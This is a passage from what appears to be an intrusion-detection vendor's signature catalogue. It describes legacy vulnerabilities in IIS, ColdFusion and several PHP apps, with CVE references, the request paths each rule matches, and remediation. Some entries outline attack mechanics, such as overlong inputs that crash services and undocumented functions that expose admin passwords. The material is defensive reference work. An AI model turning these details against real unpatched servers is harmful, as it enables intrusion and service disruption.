Microsoft IIS 4.0 Buffer Overflow while processing .HTR, .STM and .IDC files Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0874 Bugtraq: 307
Signature Description: Microsoft Internet Information Server (IIS) version 4.0 is vulnerable to a denial of service
attack caused by a buffer overflow involving the way that .HTR, .STM, and .IDC files are processed. IIS version 4.0
can perform various server-side processing with specific file types. Requests for files ending with .HTR, .STM, or .IDC
extensions are passed to the appropriate external DLL for processing. By sending a malformed request, an attacker can
overflow a buffer and cause the service to crash. It may be possible for an attacker to use this vulnerability to execute
arbitrary code on the system.
Signature ID: 1756
WEB-IIS iissamples access Vulnerability
Threat Level: Information
Nessus: 11032
Signature Description: This event indicates that an attempt has been made to exploit potential weaknesses in a host
running Microsoft IIS. The attacker may be trying to gain information on the IIS implementation on the host, this may
be the prelude to an attack against that host using that information. The attacker may also be trying to gain
administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
This rule triggers when an attempt is made to send an iissamples pattern.
Signature ID: 1759
WEB-IIS JET VBA access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0874 Bugtraq: 286,307
Signature Description: Microsoft JET database engine is a database management system that retrieves data from and
stores data in user and system databases. The Microsoft Jet database engine can be thought of as a data manager upon
which database systems, such as Microsoft Access, are built. Microsoft JET database engine has sophisticated query
and optimization capabilities that are unmatched by other desktop database engines in its class. Microsoft JET 3.51,
Microsoft JET 3.5 and Microsoft IIS 4.0 are vulnerable. Successful exploitation allows an attacker to gain information
on the vulnerable system. This vulnerability is fixed in Microsoft JET 4.0; administrators are advised to upgrade to
Microsoft JET 4.0 or later to resolve this vulnerability.
Signature ID: 1760
CGI script mkilog.exe access Vulnerability
Threat Level: Information
Nessus: 10359
Signature Description: This rule gets hit when an attempt is made to access the file mkilog.exe. mkilog.exe is a
Common Gateway Interface (CGI) script that can be used to view and modify SQL database contents. It posts data to
another module, ctss.idc, that creates a table based on the parameters passed to it. If an attacker passes parameters such
as a valid username and password to create a table, it may be possible to alter the table to execute commands on the
vulnerable server.
Signature ID: 1761
Microsoft IIS unauthorized ODBC data access with RDS Vulnerability
Threat Level: Information
Industry ID: CVE-1999-1011 Bugtraq: 529 Nessus: 10359
Signature Description: MDAC (Microsoft Data Access Components) is a package used to integrate web and database
services. It includes a component named RDS (Remote Data Services) which allows remote access via the internet to
database objects through IIS. Microsoft Data Access Components (MDAC) versions 2.1 and earlier, in the default
configuration, could allow a remote attacker to access OLE database sources. Remote Data Services (RDS), one of the
components of MDAC, is designed to permit remote data access to authenticated users through Microsoft Internet
Information Server (IIS). A vulnerability in the DataFactory object of RDS could allow an attacker to use a Web client
to send a SQL query to OLE database data sources.
Signature ID: 1763
Microsoft IIS Outlook Web Access Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0666 Bugtraq: 3223,3368
Signature Description: Outlook Web Access is an optional component of Microsoft Exchange Server which runs in
conjunction with Microsoft Internet Information Server. It provides access to a user's Exchange mailbox through a web
interface. A vulnerability exists in OWA in Exchange Server 5.5 to 5.5 SP4. A user can enter a long string of %
characters into the Log On field in the Outlook Web Access page. Then, when the user receives the NT challenge
dialog, a username and password composed of a long string of % characters is also entered. This will cause the WWW
Publishing service and the IIS Administration service to stop. (Ref: MS01-049)
Signature ID: 1764
Microsoft Internet Information Services (IIS) access to /scripts/perl vulnerability
Threat Level: Information
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule triggers
when an attempt is made to access the /scripts/perl directory on a web server. This may indicate that an attacker is
attempting to run code of their choosing on that server; successful exploitation of this issue allows an attacker to
execute arbitrary commands.
Signature ID: 1765
CGI Lite Perl Module Metacharacter Input Validation Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1365 Bugtraq: 6833
Signature Description: CGI::Lite is a Perl module used for processing and decoding Web form and query information.
The escape_dangerous_chars() function in version 2.0 of the CGI::Lite module fails to filter out certain special
characters from form input. A remote attacker could exploit this vulnerability to read or write to local files, and
possibly execute shell commands on the Web server by supplying malicious form input to an affected Web server.
Signature ID: 1767
WEB-IIS postinfo.asp access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0360 Bugtraq: 1811
Signature Description: Microsoft Site Server is an intranet server designed for an NT Server with IIS. Site Server
enables users to locate and view information stored in various locations through personalized web pages and
emails. The 'Users' directory, if not already created, is automatically generated once the first successful upload has been
completed. By default the 'Everyone' group is given NTFS Change privileges in the 'Users' directory. As well, Scripting
and Write permissions are assigned by IIS. Due to all of these factors, it is possible for a user to create and upload
various content including ASP pages to the web server through the Anonymous Internet Account
(IUSR_machinename). Successful exploitation of this vulnerability will allow a remote user to upload malicious content
to the web site. Vulnerable platform is Microsoft Site Server Commerce Edition 2.0.
Signature ID: 1768
WEB-IIS query.asp access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0449 Bugtraq: 193 Nessus: 10002
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including a Web or
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. Microsoft
IIS (version 4.0) installations that include the "ExAir" sample site pages are vulnerable to a denial of service attack. If
certain ExAir .asp (Active Server Pages) pages are requested directly without the sample site DLLs running, server CPU
usage rises to 100%. By submitting requests for these .asp pages, an attacker can exhaust all CPU resources on the
server.
Signature ID: 1769
WEB-IIS search97.vts access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0449 Bugtraq: 193 Nessus: 10002
Signature Description: The Verity Search'97 software provides a search engine. Verity Search97 2.1.0 is vulnerable to
a cross-site scripting attack. This vulnerability is due to the cgi-bin scripts s97_cgi and s97r_cgi failing to check for
the existence of certain shell metacharacters. Successful exploitation of this issue allows an attacker to access any file
on the file system. This rule triggers when an attempt is made to send a search97.vts pattern. This issue is fixed in the
latest versions; apply the patch for this vulnerability, available from the Verity Customer Support site.
Signature ID: 1770
WEB-IIS sgdynamo.exe access Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0375 Bugtraq: 4720 Nessus: 11955
Signature Description: SGDynamo is a web application engine for Microsoft Windows operating systems. SGDynamo
is vulnerable to cross-site scripting. A remote attacker could create a malicious URL link to sgdynamo.exe with
JavaScript embedded in the HTNAME parameter, which executes once the link is clicked. An attacker could use this
vulnerability to steal a user's cookies and execute arbitrary code on the system. Upgrade to version 5.32T or later
(5.32U, 6.1, 7.00), available at the vendor's website.
Signature ID: 1772
Microsoft Internet Information Services iissamples directory access Vulnerability
Threat Level: Information
Nessus: 10370
Signature Description: This rule gets hit when an attempt is made to access iissamples directory on a host running
Microsoft Internet Information Server (IIS). Some applications may store sensitive information such as database
connections, user information, passwords and customer information in files accessible via a web interface. Care should
be taken to ensure these files are not accessible to external sources. The attacker may be trying to gain information on
the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
Signature ID: 1773
Srch.htm file access on Microsoft Internet Information Server Vulnerability
Threat Level: Information
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including Hypertext
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule triggers
when an attempt is made to access the sample 'search functionality' application on a Microsoft IIS server. This
application may give an attacker the opportunity to gain valuable information regarding the implementation of IIS on
the affected host.
Signature ID: 1774
Microsoft Index Server 'srchadm' file access Vulnerability
Threat Level: Information
Nessus: 11032
Signature Description: The Microsoft Indexing Server comes as part of Windows 2000, Windows XP and Windows
2003 and does not require any additional licensing. Indexing Server provides search capabilities. This rule triggers
when an attempt is made to access srchadm, a directory used by the Microsoft Index Server in IIS. The attacker may be
trying to gain information on the IIS implementation on the host, which may be the prelude to an attack against that
host using that information.
Signature ID: 1775
Microsoft Site Server 2.0 with IIS 4.0 uploadn.asp file access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0360 Bugtraq: 1811
Signature Description: Microsoft Site Server is an intranet server designed for an NT Server with IIS. Site Server
enables users to locate and view information stored in various locations through personalized web pages and emails.
The 'Users' directory, if not already created, is automatically generated once the first successful upload has been
completed. By default the 'Everyone' group is given NTFS Change privileges in the 'Users' directory. As well, Scripting
and Write permissions are assigned by IIS. Due to all of these factors, it is possible for a user to create and upload
various content including ASP pages to the web server through the Anonymous Internet Account
(IUSR_machinename). Successful exploitation of this vulnerability will allow a remote user to upload malicious content
to the web site. Microsoft Site Server Commerce Edition 2.0 is vulnerable.
Signature ID: 1776
Microsoft Internet Information Server 'users.xml' file access Vulnerability
Threat Level: Information
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including a Web or
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. This rule gets
hit when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server
(IIS). Specifically, this event indicates an attempt to retrieve the file "users.xml" which may contain username and
password information for the host.
Signature ID: 1777
Microsoft Windows 2000 Resource Kit W3Who.DLL Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2004-1134 Bugtraq: 11820
Signature Description: The Microsoft Windows 2000 Resource Kit supports many utilities designed for diagnostic
administration of the Windows platform. W3Who is an Internet server application Dynamic-Link library (DLL)
designed to display information regarding the calling context of the client browser along with the configuration of the
host server. W3Who is vulnerable to a buffer overflow. A remote attacker could send a specially-crafted string
containing 519 to 12571 characters to overflow a buffer and execute arbitrary code on the system.
Signature ID: 1779
RSA Authentication Agent for Microsoft IIS Heap Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1471 Bugtraq: 13524
Signature Description: RSA Authentication Agent software provides access control for networks, web applications,
and operating systems. It is used in conjunction with RSA SecurID Authenticators and Authentication Manager
software. RSA Authentication Agent for Web for IIS contains a heap overflow vulnerability. When a Web client sends
a Hypertext Transfer Protocol (HTTP) request to an IIS Web server, IIS parses the Uniform Resource Locator (URL)
and passes it to SecurID. SecurID then authenticates the remote user. If the user passes authentication, SecurID grants
permission to access the server. The vulnerability exists in SecurID when it parses the URL request received from
IIS. The flaw can be triggered by a specially crafted HTTP request containing data encoded using the "chunked"
transfer encoding. Successful exploitation of this vulnerability could allow a remote, unauthenticated attacker to
execute arbitrary code with LocalSystem privileges on the vulnerable server. Vulnerable platforms are RSA
Authentication Agent for Web 5.0, 5.2, and 5.3.
Signature ID: 1800
WEB-COLDFUSION CFUSION_VERIFYMAIL access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented CFUSION_VERIFYMAIL()
function could be used by an attacker to verify the connection to the default ColdFusion SMTP mail server.
Signature ID: 1801
WEB-COLDFUSION addcontent.cfm access Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0535
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion 4.x is vulnerable. Undocumented CFML tags in ColdFusion allow a remote attacker to gain
unauthorized access to administrative privileges, including registry and advanced security settings. This rule
triggers when an attempt is made to send the cfdocs/exampleapp/publish/admin/addcontent.cfm pattern. Update to the
latest version to resolve this issue.
Signature ID: 1802
WEB-COLDFUSION admin decrypt Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The cfusion_decrypt() function can be used to
retrieve and decrypt the admin and studio passwords. With these passwords, an attacker can use a variety of tools to
retrieve directory listings, upload files, access the registry, and access security settings.
Signature ID: 1803
WEB-COLDFUSION admin encrypt Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The cfusion_encrypt() function can be used to
retrieve and decrypt the admin and studio passwords. With these passwords, an attacker can use a variety of tools to
retrieve directory listings, upload files, access the registry, and access security settings.
Signature ID: 1804
Allaire ColdFusion Path Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0189 Bugtraq: 1021
Signature Description: Allaire ColdFusion is a popular web applications development tool. ColdFusion uses a tag-based,
server scripting language that is ideal for programming web applications. The ColdFusion Markup Language (CFML)
cleanly integrates with HTML (Hypertext Markup Language) for the user interface and XML for data exchange.
ColdFusion Server (versions 4.0, 4.0.1, and 4.5.0) allows a remote attacker to determine the real pathname of the
server via an HTTP request to application.cfm. Upgrade to the latest version of Allaire ColdFusion, available at the
vendor's website.
Signature ID: 1805
WEB-COLDFUSION beaninfo access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the
cfdocs/examples/cvbeans/beaninfo.cfm pattern. Patches are available from the vendor's web site.
Signature ID: 1806
WEB-COLDFUSION cfappman access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the cfappman/index.cfm pattern.
Patches are available from the vendor's web site.
Signature ID: 1807
Allaire ColdFusion 4.0x CFCACHE Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0057 Bugtraq: 917
Signature Description: Allaire ColdFusion is a popular web applications development tool. ColdFusion uses a tag-based,
server scripting language that is ideal for programming web applications. The ColdFusion Markup Language (CFML)
cleanly integrates with HTML (Hypertext Markup Language) for the user interface and XML for data exchange.
ColdFusion versions 4.0 and 4.0.1 use a CFCACHE tag. When the CFCACHE tag is used in a CFM page, it creates
temporary files and also creates a cfcache.map file (which contains pointers to the .tmp files, including absolute
pathnames, timestamps, and other URL information) within the web document root, allowing a remote attacker to
obtain sensitive system information. Upgrade to the latest version of ColdFusion (4.5 or later), available at the
vendor's website.
Signature ID: 1808
WEB-COLDFUSION datasource Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented
CFUSION_ISCOLDFUSIONDATASOURCE() function could be used by an attacker to verify a connection to a
ColdFusion data source.
Signature ID: 1809
WEB-COLDFUSION datasource password Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented
CFUSION_SETDATASOURCEPASSWORD() function could be used by an attacker to set the default password for
the ColdFusion data source.
Signature ID: 1810
WEB-COLDFUSION datasource username vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented
CFUSION_SETDATASOURCEUSERNAME() function could be used by an attacker to set the default user name for
a ColdFusion data source.
Signature ID: 1811
WEB-COLDFUSION db connections flush vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented
CFUSION_DBCONNECTIONS_FLUSH() function could be used by an attacker to disconnect all currently connected
ColdFusion data sources.
Signature ID: 1812
WEB-COLDFUSION displayfile access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the
cfdocs/expeval/displayopenedfile.cfm pattern. Patches are available from the vendor's web site.
Signature ID: 1813
WEB-COLDFUSION evaluate.cfm access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the cfdocs/snippets/evaluate.cfm
pattern. Patches are available from the vendor's web site.
Signature ID: 1814
WEB-COLDFUSION exampleapp access Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0535 CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion 4.5 is vulnerable. Undocumented CFML tags in ColdFusion allow a remote attacker to gain
unauthorized access to administrative privileges, including registry and advanced security settings. This rule
triggers when an attempt is made to send the cfdocs/exampleapp/email/application.cfm pattern. This issue is fixed in
Allaire ColdFusion Server 5.0. Administrators are advised to update to version 5.0 or later to resolve this issue.
Signature ID: 1815
WEB-COLDFUSION exampleapp application.cfm Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0189 Bugtraq: 1021
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 4.0, 4.0.1, and 4.5 are vulnerable to path disclosure. Undocumented CFML tags in
ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry and
advanced security settings. This rule triggers when an attempt is made to send the
cfdocs/exampleapp/email/application.cfm pattern. This issue is fixed in Allaire ColdFusion Server 4.5.1.
Administrators are advised to update to version 4.5.1 to resolve this issue.
Signature ID: 1816
WEB-COLDFUSION expeval access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0477 CVE-1999-0760 Bugtraq: 550,115
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, and 4.0 are vulnerable. Undocumented CFML tags in
ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry and
advanced security settings. This rule triggers when an attempt is made to send the cfdocs/expeval/ pattern. This issue
is fixed in ColdFusion 4.0.1. Administrators are advised to update to version 4.0.1 to resolve this issue.
Signature ID: 1817
Allaire Forums Getfile Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0800 Bugtraq: 229
Signature Description: Allaire Forums is a flexible conferencing system that enables on-line discussions via the Web
on intranets and the Internet. With Forums, users can create web conferences where people communicate and share
information using a Web browser. The "GetFile.cfm" script in Allaire Forums allows anyone to access any file on the
Forums server. This vulnerability affects Forums version 2.0.4 and earlier. Upgrade to the latest version of Allaire
Forums, available at the vendor's website.
Signature ID: 1818
WEB-COLDFUSION getodbcdsn access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0477 CVE-1999-0760 Bugtraq: 550,115
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented CFUSION_GETODBCDSN()
function could be used by an attacker to get ODBC data source names from the registry.
Signature ID: 1819
WEB-COLDFUSION getodbcin Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0477 CVE-1999-0760 Bugtraq: 550,115
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented CFUSION_GETODBCINI()
function could be used by an attacker to get ODBC data source information from the registry.
Signature ID: 1820
WEB-COLDFUSION gettempdirectory.cfm access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the
cfdocs/snippets/gettempdirectory.cfm pattern. Patches are available from the vendor's web site.
Signature ID: 1821
WEB-COLDFUSION mainframeset access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the
cfdocs/examples/mainframeset.cfm pattern. Patches are available from the vendor's web site.
Signature ID: 1822
WEB-COLDFUSION onrequestend.cfm access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0189 CVE-1999-0760 Bugtraq: 550,1021
Signature Description: Allaire ColdFusion is a popular web applications development tool. ColdFusion uses a tag-based,
server scripting language that is ideal for programming web applications. The ColdFusion Markup Language (CFML)
cleanly integrates with HTML (Hypertext Markup Language) for the user interface and XML for data exchange.
ColdFusion Server (versions 4.0, 4.0.1, and 4.5.0) allows a remote attacker to determine the real pathname of the
server via an HTTP request to the onrequestend files. Upgrade to the latest version of Allaire ColdFusion, available at
the vendor's website.
Signature ID: 1823
WEB-COLDFUSION parks access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the
cfdocs/examples/parks/detail.cfm pattern. Patches are available from the vendor's web site.
Signature ID: 1824
WEB-COLDFUSION sendmail.cfm access Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0535 CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion 4.0 is vulnerable. Undocumented CFML tags in ColdFusion allow a remote attacker to gain
unauthorized access to administrative privileges, including registry and advanced security settings. This rule
triggers when an attempt is made to send the sendmail.cfm pattern. Patches are available from the vendor's web
site.
Signature ID: 1825
WEB-COLDFUSION setodbcini Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented CFUSION_SETODBCINI()
function could be used by an attacker to set ODBC data source information in the registry.
Signature ID: 1826
WEB-COLDFUSION settings refresh vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is a programming language based on standard HTML (Hypertext Markup
Language) that is used to create and serve web-based applications that interact with back-end databases. Web pages
that interact with ColdFusion application servers have a .cfm file extension. ColdFusion Web pages include tags written
in ColdFusion Markup Language (CFML). ColdFusion servers (versions 3.x and 4.x) include undocumented CFML
tags and functions that are used in the ColdFusion Administrator. The undocumented CFUSION_SETTINGS_REFRESH()
function could be used by an attacker to refresh some ColdFusion settings that do not require a restart.
Signature ID: 1827
WEB-COLDFUSION snippets vulnerability
Threat Level: Information
Industry ID: CVE-1999-0760 Bugtraq: 550
Signature Description: ColdFusion is an application server and software development framework used for the
development of computer software in general, and dynamic web sites in particular. ColdFusion is a product similar to
Microsoft ASP.NET, JavaServer Pages, or PHP. ColdFusion Server includes several undocumented CFML tags and
functions. ColdFusion versions 2.0, 3.0, 3.0.1, 3.1, 3.1.1, 3.1.2, 4.0, and 4.0.1 are vulnerable. Undocumented CFML
tags in ColdFusion allow a remote attacker to gain unauthorized access to administrative privileges, including registry
and advanced security settings. This rule triggers when an attempt is made to send the cfdocs/snippets pattern.
Patches are available from the vendor's web site.
Signature ID: 1828
WEB-JBrowser PHP /_admin access vulnerability
Threat Level: Information
Industry ID: CVE-2007-1156 Bugtraq: 9537 Nessus: 12032
Signature Description: JBrowser is a French program that allows a user to create miniature gallery images for
Microsoft Windows operating systems. JBrowser versions 2.4 and earlier are vulnerable to unauthorized access. Due to a
lack of access validation for the '_admin' directory, malicious users may be able to execute arbitrary admin scripts.
This may allow a malicious user to upload arbitrary files to the affected system and gain access to files outside of the
web server root directory.
Signature ID: 1829
WEB-PHP Advanced Poll admin_comment.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_comment.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1830
WEB-PHP Advanced Poll admin_edit.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
Unix, Linux, and Microsoft operating systems. Advanced Poll version 2.0.2 could allow a remote attacker to include
malicious PHP files. A specially crafted URL request to the admin_edit.php script using the 'base_path' or
'pollvars[lang]' variables would allow a remote attacker to read arbitrary files or include arbitrary local PHP files.
No remedy was available as of August 2008.
Signature ID: 1831
WEB-PHP Advanced Poll admin_embed.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1180 Bugtraq: 8890 Nessus: 11487
Signature Description: Advanced Poll is a freely available, open source PHP web application. It is available for the
